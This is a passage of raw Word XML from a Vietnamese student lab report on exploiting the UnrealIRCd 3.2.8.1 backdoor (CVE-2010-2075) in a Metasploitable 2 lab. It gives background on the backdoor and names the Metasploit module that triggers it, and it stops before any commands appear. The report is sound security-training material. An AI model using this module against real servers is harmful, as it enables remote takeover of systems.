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FBA1E" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="007B6FC0">
      <w:pPr>
        <w:spacing w:before="500"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1444081D" w14:textId="1D1EA159" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">BÁO CÁO </w:t>
      </w:r>
      <w:r w:rsidR="004E1C77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>LAB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F7F3B7" w14:textId="0966FA38" w:rsidR="007B6FC0" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:before="200" w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">LAB </w:t>
      </w:r>
      <w:r w:rsidR="00A410FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>TẤN CÔNG LỖ HỔNG UNREALIRCD 3.2.8.1 BACKDOOR COMMAND EXECUTION (CVE-2010-2075)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134D6948" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="007B6FC0">
      <w:pPr>
        <w:spacing w:before="600"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="258C0428" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="007B6FC0">
      <w:pPr>
        <w:spacing w:before="1000"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2069FF87" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="534E3A4B" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74C5CAAE" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E88CC89" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D75C11" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B014C58" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1305AF40" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75066D4F" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12283496" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F425EBB" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CCF277F" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43CC7BF9" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66537C7F" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33BD6E06" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0116E230" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43A2E237" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C817C86" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="455FCBFC" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23780F72" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E8305F1" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="177EFFC6" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D85140F" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="282E5EAD" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F6F9BA7" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BC5D2DA" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767D493F" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44212F09" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="190B17AB" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A0C6106" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E85AA22" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BA52C29" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21303F1B" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E9791E7" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07884C13" w14:textId="37C51F70" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DB2AB4" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="007B6FC0">
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D01FEE6" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>MỤC LỤC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509CB0A5" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>1. Mở đầu ................................................................................................. 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263183C8" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>2. Cơ sở lý thuyết – Lỗ hổng CVE-2010-2075 ......................................... 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54996154" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   2.1. Tổng quan lỗ hổng .......................................................................... 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B37ACE8" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   2.2. Nguyên nhân và thời gian ảnh hưởng ............................................. 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F10E82" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   2.3. Mức độ nghiêm trọng và cách khai thác ......................................... 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C65CFA" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>3. Môi trường và công cụ thực nghiệm ..................................................... 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE9D529" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>4. Quy trình thực nghiệm .......................................................................... 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A366C6" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   4.1. Thăm dò (Reconnaissance) ............................................................. 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAAB4E3" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   4.2. Khai thác bằng Metasploit ............................................................. 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EA4527" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   4.3. Kết quả thực nghiệm ...................................................................... 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306BB718" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>5. Phân tích và nhận xét ............................................................................ 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5BE9F6" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>6. Biện pháp phòng thủ và giảm thiểu ..................................................... 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742B5ED3" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>7. Kết luận ............................................................................................... 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE1CA66" w14:textId="4CF844F5" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Tài liệu tham khảo ................................................................................... 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7A44FE" w14:textId="4CB5A3E2" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5CE63F" w14:textId="59F9F439" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="651B19ED" w14:textId="5BBE9687" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39A1956E" w14:textId="06EE7561" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0519CA9B" w14:textId="497E50E8" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DF2C1C1" w14:textId="34FFCB0D" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="541D8591" w14:textId="0B99EF55" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B7F59AF" w14:textId="4FA06531" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5756E1BD" w14:textId="3B1F00CD" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F6E9CF4" w14:textId="4188065F" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A693A2A" w14:textId="51E913F4" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75AF6868" w14:textId="654545C8" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D92E7FE" w14:textId="77DAC90C" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F5FC008" w14:textId="3756B153" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13DD7C65" w14:textId="32F9EDDB" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3926C91E" w14:textId="1FFE6695" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB21E11" w14:textId="35387E5E" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5354B04B" w14:textId="72FC0668" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="498EC9D4" w14:textId="05E1A236" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C189D13" w14:textId="174EC93B" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="448AA26B" w14:textId="1585AF60" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44A5BACF" w14:textId="77777777" w:rsidR="004E1C77" w:rsidRDefault="004E1C77">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771E8DBB" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1. MỞ ĐẦU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A30479A" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>UnrealIRCd là phần mềm máy chủ IRC (Internet Relay Chat) mã nguồn mở phổ biến trên các hệ thống Unix/Linux. Năm 2010, cộng đồng phát hiện một backdoor độc hại đã bị chèn vào mã nguồn của bản phân phối UnrealIRCd 3.2.8.1, cho phép kẻ tấn công từ xa thực thi lệnh tùy ý trên máy chủ bị ảnh hưởng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5937C4C6" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Báo cáo này trình bày quá trình thực nghiệm khai thác lỗ hổng backdoor UnrealIRCd 3.2.8.1 (CVE-2010-2075) trên hệ thống Metasploitable 2 bằng Kali Linux và Metasploit Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B84B400" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Mục tiêu thực nghiệm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFA3632" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:t>Hiểu bản chất backdoor trong UnrealIRCd 3.2.8.1 và CVE-2010-2075.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FDFFF7" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện thăm dò và xác định dịch vụ IRC trên máy mục tiêu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C51A4D5" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:t>Khai thác lỗ hổng bằng module Metasploit chuyên biệt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432D741E" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:t>Đánh giá kết quả và rút ra biện pháp phòng thủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CC7C96" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Nâng cao kỹ năng Red Team thông qua thực nghiệm có kiểm soát.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD47097" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. CƠ SỞ LÝ THUYẾT – LỖ HỔNG CVE-2010-2075</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF0327C" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1. Tổng quan lỗ hổng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CDB2E4" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>CVE-2010-2075 là lỗ hổng backdoor (cửa hậu) độc hại đã được đưa vào mã nguồn của bản phân phối UnrealIRCd 3.2.8.1. Backdoor này cho phép kẻ tấn công từ xa thực thi các lệnh tùy ý trên máy chủ đang chạy ứng dụng UnrealIRCd bị ảnh hưởng, dẫn đến khả năng chiếm quyền kiểm soát hoàn toàn hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F548143" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2. Nguyên nhân và thời gian ảnh hưởng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EFB62B" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Mã độc được thêm vào trong macro DEBUG3_DOLOG_SYSTEM của mã nguồn. Bản cài đặt nén (Unreal3.2.8.1.tar.gz) chứa backdoor đã được phân phối trên một số trang mirror (nhân bản) từ tháng 11 năm 2009 đến ngày 12 tháng 6 năm 2010. Ứng dụng bị ảnh hưởng là UnrealIRCd phiên bản 3.2.8.1 được tải xuống trong khoảng thời gian trên. Lỗ hổng chủ yếu ảnh hưởng đến các hệ thống Unix/Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322C4665" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.3. Mức độ nghiêm trọng và cách khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67956210" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Mức độ khai thác rất nghiêm trọng: kẻ tấn công có thể giành được quyền truy cập và kiểm soát hoàn toàn máy chủ IRC bị ảnh hưởng. Lỗ hổng có thể được khai thác thông qua module sẵn có trong Metasploit Framework: exploit/unix/irc/unreal_ircd_3281_backdoor. Module này gửi payload đặc biệt đến dịch vụ IRC để kích hoạt backdoor và thực thi lệnh từ xa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DFE3B1" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. MÔI TRƯỜNG VÀ CÔNG CỤ THỰC NGHIỆM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7B6FC0" w14:paraId="783ACC5A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p w14:paraId="702EDC02" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Thành phần</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p w14:paraId="50BB2958" w14:textId="77777777" w:rsidR="007B6FC0" w:rsidRDefault="00A410FE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
